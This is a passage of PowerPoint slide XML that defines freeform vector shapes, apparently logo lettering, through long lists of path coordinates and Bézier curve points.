                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B7C25D4-7D9A-01D6-660E-75B74514DA75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6992830" y="2371951"/>
              <a:ext cx="122659" cy="914341"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 122659"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 914341"/>
                <a:gd name="connsiteX1" fmla="*/ 122659 w 122659"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 914341"/>
                <a:gd name="connsiteX2" fmla="*/ 122659 w 122659"/>
                <a:gd name="connsiteY2" fmla="*/ 914341 h 914341"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 122659"/>
                <a:gd name="connsiteY3" fmla="*/ 914341 h 914341"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="122659" h="914341">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="122659" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122659" y="914341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="9143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latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freihandform: Form 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FFD769C-690E-F9BC-DA00-80BA3D55AF28}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7423683" y="2426800"/>
              <a:ext cx="4182422" cy="941357"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3600394 w 4182422"/>
                <a:gd name="connsiteY0" fmla="*/ 545242 h 941357"/>
                <a:gd name="connsiteX1" fmla="*/ 3512056 w 4182422"/>
                <a:gd name="connsiteY1" fmla="*/ 599184 h 941357"/>
                <a:gd name="connsiteX2" fmla="*/ 3516701 w 4182422"/>
                <a:gd name="connsiteY2" fmla="*/ 622437 h 941357"/>
                <a:gd name="connsiteX3" fmla="*/ 3588311 w 4182422"/>
                <a:gd name="connsiteY3" fmla="*/ 651261 h 941357"/>
                <a:gd name="connsiteX4" fmla="*/ 3687819 w 4182422"/>
                <a:gd name="connsiteY4" fmla="*/ 623348 h 941357"/>
                <a:gd name="connsiteX5" fmla="*/ 3705512 w 4182422"/>
                <a:gd name="connsiteY5" fmla="*/ 574988 h 941357"/>
                <a:gd name="connsiteX6" fmla="*/ 3705512 w 4182422"/>
                <a:gd name="connsiteY6" fmla="*/ 549872 h 941357"/>
                <a:gd name="connsiteX7" fmla="*/ 3600394 w 4182422"/>
                <a:gd name="connsiteY7" fmla="*/ 545242 h 941357"/>
                <a:gd name="connsiteX8" fmla="*/ 2419807 w 4182422"/>
                <a:gd name="connsiteY8" fmla="*/ 371294 h 941357"/>
                <a:gd name="connsiteX9" fmla="*/ 2380740 w 4182422"/>
                <a:gd name="connsiteY9" fmla="*/ 378729 h 941357"/>
                <a:gd name="connsiteX10" fmla="*/ 2311948 w 4182422"/>
                <a:gd name="connsiteY10" fmla="*/ 507071 h 941357"/>
                <a:gd name="connsiteX11" fmla="*/ 2319386 w 4182422"/>
                <a:gd name="connsiteY11" fmla="*/ 560072 h 941357"/>
                <a:gd name="connsiteX12" fmla="*/ 2421660 w 4182422"/>
                <a:gd name="connsiteY12" fmla="*/ 635403 h 941357"/>
                <a:gd name="connsiteX13" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY13" fmla="*/ 507983 h 941357"/>
                <a:gd name="connsiteX14" fmla="*/ 2419807 w 4182422"/>
                <a:gd name="connsiteY14" fmla="*/ 371294 h 941357"/>
                <a:gd name="connsiteX15" fmla="*/ 2771158 w 4182422"/>
                <a:gd name="connsiteY15" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX16" fmla="*/ 2953445 w 4182422"/>
                <a:gd name="connsiteY16" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX17" fmla="*/ 2953445 w 4182422"/>
                <a:gd name="connsiteY17" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX18" fmla="*/ 3016678 w 4182422"/>
                <a:gd name="connsiteY18" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX19" fmla="*/ 3016678 w 4182422"/>
                <a:gd name="connsiteY19" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX20" fmla="*/ 2764635 w 4182422"/>
                <a:gd name="connsiteY20" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX21" fmla="*/ 2764635 w 4182422"/>
                <a:gd name="connsiteY21" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX22" fmla="*/ 2835331 w 4182422"/>
                <a:gd name="connsiteY22" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX23" fmla="*/ 2835331 w 4182422"/>
                <a:gd name="connsiteY23" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX24" fmla="*/ 2771158 w 4182422"/>
                <a:gd name="connsiteY24" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX25" fmla="*/ 1904769 w 4182422"/>
                <a:gd name="connsiteY25" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX26" fmla="*/ 2087043 w 4182422"/>
                <a:gd name="connsiteY26" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX27" fmla="*/ 2087043 w 4182422"/>
                <a:gd name="connsiteY27" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX28" fmla="*/ 2150294 w 4182422"/>
                <a:gd name="connsiteY28" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX29" fmla="*/ 2150294 w 4182422"/>
                <a:gd name="connsiteY29" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX30" fmla="*/ 1898246 w 4182422"/>
                <a:gd name="connsiteY30" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX31" fmla="*/ 1898246 w 4182422"/>
                <a:gd name="connsiteY31" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX32" fmla="*/ 1968924 w 4182422"/>
                <a:gd name="connsiteY32" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX33" fmla="*/ 1968924 w 4182422"/>
                <a:gd name="connsiteY33" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX34" fmla="*/ 1904769 w 4182422"/>
                <a:gd name="connsiteY34" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX35" fmla="*/ 3615295 w 4182422"/>
                <a:gd name="connsiteY35" fmla="*/ 270888 h 941357"/>
                <a:gd name="connsiteX36" fmla="*/ 3685026 w 4182422"/>
                <a:gd name="connsiteY36" fmla="*/ 275531 h 941357"/>
                <a:gd name="connsiteX37" fmla="*/ 3807787 w 4182422"/>
                <a:gd name="connsiteY37" fmla="*/ 357386 h 941357"/>
                <a:gd name="connsiteX38" fmla="*/ 3822687 w 4182422"/>
                <a:gd name="connsiteY38" fmla="*/ 468045 h 941357"/>
                <a:gd name="connsiteX39" fmla="*/ 3822687 w 4182422"/>
                <a:gd name="connsiteY39" fmla="*/ 635446 h 941357"/>
                <a:gd name="connsiteX40" fmla="*/ 3885920 w 4182422"/>
                <a:gd name="connsiteY40" fmla="*/ 635446 h 941357"/>
                <a:gd name="connsiteX41" fmla="*/ 3885920 w 4182422"/>
                <a:gd name="connsiteY41" fmla="*/ 736816 h 941357"/>
                <a:gd name="connsiteX42" fmla="*/ 3716656 w 4182422"/>
                <a:gd name="connsiteY42" fmla="*/ 736816 h 941357"/>
                <a:gd name="connsiteX43" fmla="*/ 3716656 w 4182422"/>
                <a:gd name="connsiteY43" fmla="*/ 693107 h 941357"/>
                <a:gd name="connsiteX44" fmla="*/ 3563206 w 4182422"/>
                <a:gd name="connsiteY44" fmla="*/ 749825 h 941357"/>
                <a:gd name="connsiteX45" fmla="*/ 3393942 w 4182422"/>
                <a:gd name="connsiteY45" fmla="*/ 603815 h 941357"/>
                <a:gd name="connsiteX46" fmla="*/ 3452529 w 4182422"/>
                <a:gd name="connsiteY46" fmla="*/ 483862 h 941357"/>
                <a:gd name="connsiteX47" fmla="*/ 3587372 w 4182422"/>
                <a:gd name="connsiteY47" fmla="*/ 457833 h 941357"/>
                <a:gd name="connsiteX48" fmla="*/ 3649691 w 4182422"/>
                <a:gd name="connsiteY48" fmla="*/ 459686 h 941357"/>
                <a:gd name="connsiteX49" fmla="*/ 3702694 w 4182422"/>
                <a:gd name="connsiteY49" fmla="*/ 462463 h 941357"/>
                <a:gd name="connsiteX50" fmla="*/ 3702694 w 4182422"/>
                <a:gd name="connsiteY50" fmla="*/ 442018 h 941357"/>
                <a:gd name="connsiteX51" fmla="*/ 3690611 w 4182422"/>
                <a:gd name="connsiteY51" fmla="*/ 388076 h 941357"/>
                <a:gd name="connsiteX52" fmla="*/ 3612503 w 4182422"/>
                <a:gd name="connsiteY52" fmla="*/ 366677 h 941357"/>
                <a:gd name="connsiteX53" fmla="*/ 3590190 w 4182422"/>
                <a:gd name="connsiteY53" fmla="*/ 367618 h 941357"/>
                <a:gd name="connsiteX54" fmla="*/ 3539954 w 4182422"/>
                <a:gd name="connsiteY54" fmla="*/ 420619 h 941357"/>
                <a:gd name="connsiteX55" fmla="*/ 3430216 w 4182422"/>
                <a:gd name="connsiteY55" fmla="*/ 420619 h 941357"/>
                <a:gd name="connsiteX56" fmla="*/ 3615295 w 4182422"/>
                <a:gd name="connsiteY56" fmla="*/ 270888 h 941357"/>
                <a:gd name="connsiteX57" fmla="*/ 2404018 w 4182422"/>
                <a:gd name="connsiteY57" fmla="*/ 269903 h 941357"/>
                <a:gd name="connsiteX58" fmla="*/ 2547213 w 4182422"/>
                <a:gd name="connsiteY58" fmla="*/ 331283 h 941357"/>
                <a:gd name="connsiteX59" fmla="*/ 2547213 w 4182422"/>
                <a:gd name="connsiteY59" fmla="*/ 282943 h 941357"/>
                <a:gd name="connsiteX60" fmla="*/ 2718330 w 4182422"/>
                <a:gd name="connsiteY60" fmla="*/ 282943 h 941357"/>
                <a:gd name="connsiteX61" fmla="*/ 2718330 w 4182422"/>
                <a:gd name="connsiteY61" fmla="*/ 384314 h 941357"/>
                <a:gd name="connsiteX62" fmla="*/ 2654158 w 4182422"/>
                <a:gd name="connsiteY62" fmla="*/ 384314 h 941357"/>
                <a:gd name="connsiteX63" fmla="*/ 2654158 w 4182422"/>
                <a:gd name="connsiteY63" fmla="*/ 692121 h 941357"/>
                <a:gd name="connsiteX64" fmla="*/ 2616030 w 4182422"/>
                <a:gd name="connsiteY64" fmla="*/ 866968 h 941357"/>
                <a:gd name="connsiteX65" fmla="*/ 2423513 w 4182422"/>
                <a:gd name="connsiteY65" fmla="*/ 941357 h 941357"/>
                <a:gd name="connsiteX66" fmla="*/ 2226352 w 4182422"/>
                <a:gd name="connsiteY66" fmla="*/ 789773 h 941357"/>
                <a:gd name="connsiteX67" fmla="*/ 2336114 w 4182422"/>
                <a:gd name="connsiteY67" fmla="*/ 789773 h 941357"/>
                <a:gd name="connsiteX68" fmla="*/ 2423513 w 4182422"/>
                <a:gd name="connsiteY68" fmla="*/ 844657 h 941357"/>
                <a:gd name="connsiteX69" fmla="*/ 2522107 w 4182422"/>
                <a:gd name="connsiteY69" fmla="*/ 797229 h 941357"/>
                <a:gd name="connsiteX70" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY70" fmla="*/ 705141 h 941357"/>
                <a:gd name="connsiteX71" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY71" fmla="*/ 688403 h 941357"/>
                <a:gd name="connsiteX72" fmla="*/ 2401201 w 4182422"/>
                <a:gd name="connsiteY72" fmla="*/ 737714 h 941357"/>
                <a:gd name="connsiteX73" fmla="*/ 2191955 w 4182422"/>
                <a:gd name="connsiteY73" fmla="*/ 507983 h 941357"/>
                <a:gd name="connsiteX74" fmla="*/ 2204978 w 4182422"/>
                <a:gd name="connsiteY74" fmla="*/ 416857 h 941357"/>
                <a:gd name="connsiteX75" fmla="*/ 2404018 w 4182422"/>
                <a:gd name="connsiteY75" fmla="*/ 269903 h 941357"/>
                <a:gd name="connsiteX76" fmla="*/ 338260 w 4182422"/>
                <a:gd name="connsiteY76" fmla="*/ 189573 h 941357"/>
                <a:gd name="connsiteX77" fmla="*/ 245317 w 4182422"/>
                <a:gd name="connsiteY77" fmla="*/ 446957 h 941357"/>
                <a:gd name="connsiteX78" fmla="*/ 431200 w 4182422"/>
                <a:gd name="connsiteY78" fmla="*/ 446957 h 941357"/>
                <a:gd name="connsiteX79" fmla="*/ 1408353 w 4182422"/>
                <a:gd name="connsiteY79" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX80" fmla="*/ 1408353 w 4182422"/>
                <a:gd name="connsiteY80" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX81" fmla="*/ 1469732 w 4182422"/>
                <a:gd name="connsiteY81" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX82" fmla="*/ 1715247 w 4182422"/>
                <a:gd name="connsiteY82" fmla="*/ 402075 h 941357"/>
                <a:gd name="connsiteX83" fmla="*/ 1469732 w 4182422"/>
                <a:gd name="connsiteY83" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX84" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY84" fmla="*/ 135153 h 941357"/>
                <a:gd name="connsiteX85" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY85" fmla="*/ 135153 h 941357"/>
                <a:gd name="connsiteX86" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY86" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX87" fmla="*/ 3343908 w 4182422"/>
                <a:gd name="connsiteY87" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX88" fmla="*/ 3343908 w 4182422"/>
                <a:gd name="connsiteY88" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX89" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY89" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX90" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY90" fmla="*/ 558285 h 941357"/>
                <a:gd name="connsiteX91" fmla="*/ 3285320 w 4182422"/>
                <a:gd name="connsiteY91" fmla="*/ 635479 h 941357"/>
                <a:gd name="connsiteX92" fmla="*/ 3344847 w 4182422"/>
                <a:gd name="connsiteY92" fmla="*/ 635479 h 941357"/>
                <a:gd name="connsiteX93" fmla="*/ 3344847 w 4182422"/>
                <a:gd name="connsiteY93" fmla="*/ 736848 h 941357"/>
                <a:gd name="connsiteX94" fmla="*/ 3284381 w 4182422"/>
                <a:gd name="connsiteY94" fmla="*/ 736848 h 941357"/>
                <a:gd name="connsiteX95" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY95" fmla="*/ 580595 h 941357"/>
                <a:gd name="connsiteX96" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY96" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX97" fmla="*/ 3049091 w 4182422"/>
                <a:gd name="connsiteY97" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX98" fmla="*/ 3049091 w 4182422"/>
                <a:gd name="connsiteY98" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX99" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY99" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX100" fmla="*/ 2833452 w 4182422"/>
                <a:gd name="connsiteY100" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX101" fmla="*/ 2954359 w 4182422"/>
                <a:gd name="connsiteY101" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX102" fmla="*/ 2954359 w 4182422"/>
                <a:gd name="connsiteY102" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX103" fmla="*/ 2833452 w 4182422"/>
                <a:gd name="connsiteY103" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX104" fmla="*/ 1967060 w 4182422"/>
                <a:gd name="connsiteY104" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX105" fmla="*/ 2087965 w 4182422"/>
                <a:gd name="connsiteY105" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX106" fmla="*/ 2087965 w 4182422"/>
                <a:gd name="connsiteY106" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX107" fmla="*/ 1967060 w 4182422"/>
                <a:gd name="connsiteY107" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX108" fmla="*/ 275065 w 4182422"/>
                <a:gd name="connsiteY108" fmla="*/ 67826 h 941357"/>
                <a:gd name="connsiteX109" fmla="*/ 401442 w 4182422"/>
                <a:gd name="connsiteY109" fmla="*/ 67826 h 941357"/>
                <a:gd name="connsiteX110" fmla="*/ 625402 w 4182422"/>
                <a:gd name="connsiteY110" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX111" fmla="*/ 677400 w 4182422"/>
                <a:gd name="connsiteY111" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX112" fmla="*/ 677400 w 4182422"/>
                <a:gd name="connsiteY112" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX113" fmla="*/ 437686 w 4182422"/>
                <a:gd name="connsiteY113" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX114" fmla="*/ 437686 w 4182422"/>
                <a:gd name="connsiteY114" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX115" fmla="*/ 501792 w 4182422"/>
                <a:gd name="connsiteY115" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX116" fmla="*/ 468335 w 4182422"/>
                <a:gd name="connsiteY116" fmla="*/ 545452 h 941357"/>
                <a:gd name="connsiteX117" fmla="*/ 209085 w 4182422"/>
                <a:gd name="connsiteY117" fmla="*/ 545452 h 941357"/>
                <a:gd name="connsiteX118" fmla="*/ 175639 w 4182422"/>
                <a:gd name="connsiteY118" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX119" fmla="*/ 239765 w 4182422"/>
                <a:gd name="connsiteY119" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX120" fmla="*/ 239765 w 4182422"/>
                <a:gd name="connsiteY120" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX121" fmla="*/ 0 w 4182422"/>
                <a:gd name="connsiteY121" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX122" fmla="*/ 0 w 4182422"/>
                <a:gd name="connsiteY122" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX123" fmla="*/ 52059 w 4182422"/>
                <a:gd name="connsiteY123" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX124" fmla="*/ 3936902 w 4182422"/>
                <a:gd name="connsiteY124" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX125" fmla="*/ 4119164 w 4182422"/>
                <a:gd name="connsiteY125" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX126" fmla="*/ 4119164 w 4182422"/>
                <a:gd name="connsiteY126" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX127" fmla="*/ 4182422 w 4182422"/>
                <a:gd name="connsiteY127" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX128" fmla="*/ 4182422 w 4182422"/>
                <a:gd name="connsiteY128" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX129" fmla="*/ 3930378 w 4182422"/>
                <a:gd name="connsiteY129" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX130" fmla="*/ 3930378 w 4182422"/>
                <a:gd name="connsiteY130" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX131" fmla="*/ 4001074 w 4182422"/>
                <a:gd name="connsiteY131" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX132" fmla="*/ 4001074 w 4182422"/>
                <a:gd name="connsiteY132" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX133" fmla="*/ 3936902 w 4182422"/>
                <a:gd name="connsiteY133" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX134" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY134" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX135" fmla="*/ 1475304 w 4182422"/>
                <a:gd name="connsiteY135" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX136" fmla="*/ 1736636 w 4182422"/>
                <a:gd name="connsiteY136" fmla="*/ 147236 h 941357"/>
                <a:gd name="connsiteX137" fmla="*/ 1839860 w 4182422"/>
                <a:gd name="connsiteY137" fmla="*/ 402075 h 941357"/>
                <a:gd name="connsiteX138" fmla="*/ 1831511 w 4182422"/>
                <a:gd name="connsiteY138" fmla="*/ 489482 h 941357"/>
                <a:gd name="connsiteX139" fmla="*/ 1686412 w 4182422"/>
                <a:gd name="connsiteY139" fmla="*/ 692212 h 941357"/>
                <a:gd name="connsiteX140" fmla="*/ 1475304 w 4182422"/>
                <a:gd name="connsiteY140" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX141" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY141" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX142" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY142" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX143" fmla="*/ 1285595 w 4182422"/>
                <a:gd name="connsiteY143" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX144" fmla="*/ 1285595 w 4182422"/>
                <a:gd name="connsiteY144" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX145" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY145" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX146" fmla="*/ 750838 w 4182422"/>
                <a:gd name="connsiteY146" fmla="*/ 0 h 941357"/>
                <a:gd name="connsiteX147" fmla="*/ 832594 w 4182422"/>
                <a:gd name="connsiteY147" fmla="*/ 0 h 941357"/>
                <a:gd name="connsiteX148" fmla="*/ 832594 w 4182422"/>
                <a:gd name="connsiteY148" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX149" fmla="*/ 935759 w 4182422"/>
                <a:gd name="connsiteY149" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX150" fmla="*/ 935759 w 4182422"/>
                <a:gd name="connsiteY150" fmla="*/ 456258 h 941357"/>
                <a:gd name="connsiteX151" fmla="*/ 627228 w 4182422"/>
                <a:gd name="connsiteY151" fmla="*/ 456258 h 941357"/>
                <a:gd name="connsiteX152" fmla="*/ 627228 w 4182422"/>
                <a:gd name="connsiteY152" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX153" fmla="*/ 730401 w 4182422"/>
                <a:gd name="connsiteY153" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX154" fmla="*/ 730401 w 4182422"/>
                <a:gd name="connsiteY154" fmla="*/ 99437 h 941357"/>
                <a:gd name="connsiteX155" fmla="*/ 625402 w 4182422"/>
                <a:gd name="connsiteY155" fmla="*/ 140311 h 941357"/>
                <a:gd name="connsiteX156" fmla="*/ 597510 w 4182422"/>
                <a:gd name="connsiteY156" fmla="*/ 66914 h 94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182422" h="941357">
                  <a:moveTo>
                    <a:pt x="3600394" y="545242"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3534369" y="545242"/>
                    <a:pt x="3512056" y="559193"/>
                    <a:pt x="3512056" y="599184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3512056" y="607533"/>
                    <a:pt x="3513935" y="615910"/>
                    <a:pt x="3516701" y="622437"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3525078" y="643806"/>
                    <a:pt x="3544625" y="651261"/>
                    <a:pt x="3588311" y="651261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3634816" y="651261"/>
                    <a:pt x="3666445" y="641940"/>
                    <a:pt x="3687819" y="623348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3701781" y="611250"/>
                    <a:pt x="3705512" y="601959"/>
                    <a:pt x="3705512" y="574988"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3705512" y="549872"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3675736" y="547095"/>
                    <a:pt x="3629231" y="545242"/>
                    <a:pt x="3600394" y="545242"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2419807" y="371294"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2405871" y="371294"/>
                    <a:pt x="2391910" y="374071"/>
                    <a:pt x="2380740" y="378729"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2336114" y="397323"/>
                    <a:pt x="2311948" y="443828"/>
                    <a:pt x="2311948" y="507071"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2311948" y="525663"/>
                    <a:pt x="2314715" y="544255"/>
                    <a:pt x="2319386" y="560072"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2332383" y="606576"/>
                    <a:pt x="2371450" y="635403"/>
                    <a:pt x="2421660" y="635403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2490503" y="635403"/>
                    <a:pt x="2536069" y="585180"/>
                    <a:pt x="2536069" y="507983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2536069" y="425236"/>
                    <a:pt x="2490503" y="371294"/>
                    <a:pt x="2419807" y="371294"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2771158" y="283028"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2953445" y="283028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2953445" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016678" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016678" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764635" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764635" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835331" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835331" y="384399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2771158" y="384399"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1904769" y="283028"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2087043" y="283028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087043" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150294" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150294" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898246" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898246" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968924" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968924" y="384399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1904769" y="384399"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3615295" y="270888"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3639461" y="270888"/>
                    <a:pt x="3663653" y="272754"/>
                    <a:pt x="3685026" y="275531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3748260" y="284849"/>
                    <a:pt x="3789179" y="311820"/>
                    <a:pt x="3807787" y="357386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3818956" y="383415"/>
                    <a:pt x="3822687" y="412239"/>
                    <a:pt x="3822687" y="468045"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3822687" y="635446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885920" y="635446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885920" y="736816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3716656" y="736816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3716656" y="693107"/>
                  </a:lnTo>
                  <a:cubicBezTo>
